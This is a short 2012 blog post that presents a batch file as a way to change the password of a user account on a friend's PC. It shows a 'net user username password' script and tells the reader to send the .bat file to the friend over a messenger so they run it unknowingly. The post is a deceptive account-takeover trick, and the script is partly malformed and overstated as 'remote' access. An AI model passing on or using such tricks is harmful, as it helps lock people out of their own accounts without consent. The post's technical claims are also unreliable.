Saturday, July 21, 2012

Changing password of a remote PC

Using the below given tips you can change the password of an user account in your friend’s system.

Step 1. Open notepad.


Step 2. Type the following command.

                                   @echo off


net user username password


echo “type message here” pause


Step 3. Save as filename.bat and select type of files as all files otherwise, file didn’t work.

Step 4. Send file to your friend through any messenger.

You have successfully managed to change the Password of an user account.

No comments:

Post a Comment